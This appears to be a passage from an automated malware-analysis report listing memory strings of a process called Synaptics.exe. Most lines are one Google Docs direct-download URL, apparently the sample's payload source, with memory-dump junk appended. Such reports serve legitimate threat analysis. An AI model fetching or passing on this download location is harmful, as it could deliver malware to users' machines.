                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadGl
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.0000000005433000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH.S3-
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHw
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C50000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJGt0
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJJw1
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJfO0
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.0000000005433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL-_2
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLi;1
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007BBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLtd1
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMD
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOm
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOq
                              Source: Synaptics.exe, 00000003.00000002.1840755698.000000000BBBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007CA8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.0000000005433000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPm
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPq
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPy
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ%v
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ)U
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQB
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadRH
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007BBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS1
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSj41
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007BBA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.0000000005433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTxX1
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUA
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUO
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007D2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWIt0
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWr
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX-C2
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXIa0
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXi/1
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007BBA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYD
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007BBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ8
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_Ga0
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadaA
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007BBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadadmob
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadanci
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007BBA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007C73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbg
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcapt$
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007BBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007BBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.ne
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007BBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcom
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcom0;vr
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcom1&0
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcuri
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd.G3.
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddoub
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddservNj
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddwH0
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeGp
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeopti
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeq
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaderse
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfl
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfp
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgC
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgHi1
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007BBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgle-$
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgo
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgoogl
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh-cn
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh?r1
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhHV1
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhh
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhts-
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhzD3.
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
                              Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiC
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadid.go
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiw1
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadji
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadkl?0
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadkp
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825407310.0000000007CA8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.0000000005433000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle
                              Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle.co
                              Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleHp
                              Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlifor%
                              Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadly
Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm
Source: Synaptics.exe, 00000003.00000002.1821368617.0000000005404000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmB
Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmIn0
Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007D2D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadme.go
Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmeXr
Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.com
Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007BBA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnet.c
Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniveKi
Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnm81
Source: Synaptics.exe, 00000003.00000002.1821368617.000000000548C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnq
Source: Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnt.g
Source: Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnts.
Source: Synaptics.exe, 00000003.00000002.1825407310.0000000007C17000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
